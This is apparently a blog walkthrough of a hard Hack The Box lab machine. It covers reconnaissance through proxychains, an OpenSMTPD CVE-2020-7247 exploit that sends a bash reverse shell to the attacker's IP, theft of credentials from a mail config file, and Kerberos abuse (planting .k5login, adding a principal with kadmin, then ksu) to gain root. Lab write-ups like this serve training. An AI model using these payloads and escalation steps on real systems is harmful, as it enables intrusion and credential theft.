In this post, i would like to share a walkthrough on Tentacle Machine.
This room has been considered difficulty rated as a Hard machine
Information Gathering on Tentacle
Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN
We need to whitelist the domain name for the machine such as REALCORP.HTB
Let’s open the browser and straight into the website interface.
Let’s try to enumerate more on the website by using the command gobuster dns -d <url> -w /SecLists/Discovery/DNS/subdomains-top1million-11000.txt
No result output has been shown over here.
Let’s try a different method to get the subdomain of the machine by executing dnsenum –thread 64 –dnsserver 10.10.10.224 –file /SecLists/Discovery/DNS/subdomains-top1million-11000.txt realcorp.htb
The result of the domain can be seen below:
ns.realcorp.htb 10.197.243.77
proxy.realcorp.htb. ns.realcorp.htb
wpad.realcorp.htb 10.197.243.31Let’s open the browser and straight into the website interface.
The Website interface shows a 403 Forbidden error which we found nothing useful over here.
However, the subdomain wpad has caught my attention for a while now. Let’s do some research on it.
I have found that WPAD is a short form of Web Proxy Auto-Discovery Protocol which you can read more on WPAD findings over here
When thinking hard, I do remember that there’s a tool called proxy chains to enumerate more on the machine.
Gaining Access to Tentacle machine
For those who are not familiar with proxy chains, we can read more on the tools over here
We need to install proxychains4 by executing sudo apt-get install proxychains4. In my case, the tools have been installed before.
We can see if the proxychains4 has been successfully installed in the machine by running the command proxychains4 shown in the screenshot above.
We need to configure the /etc/proxychains4.conf with the IP that we found on dnsenum at the bottom of the file
http 10.10.10.224 3128
http 127.0.0.1 3128
http 10.197.243.77 3128Enumerate with proxy chains on the machine
Let’s do the scanning back with the Nmap command using proxychains4 tools on tentacle machine. The Nmap result came out the same except we found out there’s a new port is open which is 80/tcp open http
The website still appear 403 Forbidden error on the wpad.realcorp.htb
For this enumeration process, we will be using dirsearch.py tools the tool’s purpose would be something such as below
“dirsearch” is a mature command-line tool designed to brute force directories and files in webservers.
From the resulting output, we found out that /wpad.dat is the only file detected during the enumeration process let’s go to the URL wpad.realcorp.htb/wpad.dat to see what is saved on the file
A pop-up asking whether we want to save the file or not into our machine.
When we open the wpad.dat, we notice that the IP address and domain name is been saved on the file in programming format.
We need to find out about other IP addresses besides what we already found now. After a while, we found that there was another new IP Address which is 10.241.251.113
I did some enumeration on the IP Address that we found, and we found out that port 25 is open on the 10.241.251.113
We must start the nc listener on the machine to get the reverse shell connection back to us.
We notice that port 25 is running OpenSMTPD and do some research on it
I found that there’s an exploit on the OpenSMTPD on the internet.
Trying to exploit using cve-2020-7247
There are a lot of usable exploits that can be found on the internet, but I will be using this exploit here to proceed further. We can download the exploit into our machine by executing git clone https://github.com/FiroSolutions/cve-2020-7247-exploit
After i have done studying the exploit, we need to modify the code so that the exploit will work as we planned.
We can execute the exploit by running the command such as below:
proxychains -f /etc/proxychains.conf python3 getshell.py 10.241.251.113 25 'bash -c "exec bash -i &> /dev/tcp/<VPN's IP Address/<PORT> <&1"'
When we investigate our reverse shell terminal, we have the shell back
We found out that we access the machine via root@smtp which find suspicious because too early to get root.
Let’s see on the /root/ directory and we found nothing stored there.
Maintaining Access to the Tentacle machine
We can go to /home/j.nakazawa directory and there’s a file name that caught my attention such as .msmtprc
We can open the .msmtprc file by running the command “cat .msmtprc“
Oh wow! We got the credentials such as the user and password that have been shown above.
Let’s access the machine with j.nakazawa credentials via ssh service and unfortunately, we cannot access the machine via ssh service.
Based on the password that has been found on /home/j.nakazawa/.msmtprc, i notice that the password has been saved in Kerberos formatting
Playing with the Kerberos tool on the machine
In my research, i found out that krb5 is included in the Kerberos which we need to install on the machine.
We can install it by using the command sudo apt-get install krb5-user
Once we have successfully downloaded, we need to modify the /etc/krb5.conf by adding the following
default_realm = REALCORP.HTB
REALCORP.HTB = {
kdc = 10.10.10.224
}
We also need to add
10.10.10.224 realcorp.htb
10.10.10.224 srv01.realcorp.htb
Honestly, i don’t have any knowledge of how to create a ticket using Kerberos. As a result, let’s do some further research on it
We managed to learn how to create a Kerberos Ticket on this website
Exploiting with kinit and klist function on the machine
We need to create the ticket by using the command kinit j.nakazawa with the password that we found earlier
I can see the available ticket by running the command klist
Let’s try to access the machine via ssh j.nakazawa@realcorp.htb
Sadly, we cannot access the machine with the password found earlier.
Let’s troubleshoot the issues by running the command ssh -v and the error log such as Server krbtgt/HTB@REALCORP.HTB not found in the Kerberos database
I have banged my head multiple times and stuck on the issues for around 12 hours.
After 12 hours stuck on the issues, i have decided to use the config such as 10.10.10.224 srv01.realcorp.htb on the /etc/hosts
Next, we re-try creating the ticket by using kinit j.nakazawa with the password found and klist command.
Let’s try again to access the machine via ssh j.nakazawa@10.10.10.224 and we have finally accessed the machine.
We can read the user flag by going to /home/j.nakazawa directory and use the command “cat user.txt“
Escalate to Root Privileges Access on Tentacle machine
Normally, there’s something interesting on /opt/ directory
Let’s go to the /etc/ directory and try to look at whatever can be useful to us to escalate the privileges access.
We found a file called crontab and for those who are not familiar with Linux Operating System, crontab is a table of the list of tasks scheduled to run at regular time intervals on the system
Let’s open the crontab file and we notice there’s a directory at the bottom of the file which leads to /usr/local/bin/log_backup.sh
We can read the log_backup.sh file that is located inside the /usr/local/bin/ directory. While reading the bash file, i notice that everything stored in /var/log/squid will be transferred to /home/admin
Let’s create a file that contains the username of the machine (j.nakazawa@realcorp.htb) and save it as. k5login.
When i try to list down the file and I got an error saying permission denied
Let’s create the same command as previously on /home/j.nakazawa and the file is stored there.
So, let’s copy the .k5login into the /var/log/squid
Let’s try to ssh to admin privileges at srv01.realcorp.htb and it works like charm!
We try to look at what has been stored here and we found two squid log files in this directory
Play with the klist command
We will continue doing some research with the klist command which can be found here
Let’s see the principal that is stored inside the /etc/krb5.keytab by using the command klist -k /etc/krb5.keytab
Some research on kadmin command is found over here
We can create a new principal by executing the following command
kadmin -k -t /etc/krb5.keytab -p kadmin/admin@REALCORP.HTB
add_principal root@REALCORP.HTBHow to escalate to root from here?
We will be learning on ksu command which can be read here
From the article that i read, we need to execute ksu root to escalate to root privileges access. We will be asking for a password where the password is the same as we configure previously during the kadmin command.
We can read the root flag by going to /root/ directory and using the command “cat root.txt”
-THE END-
Happy Learning Guys!
Extra Information on
We can get the root hashes at /etc/shadow which it will be using as the password to read this write-up
No responses yet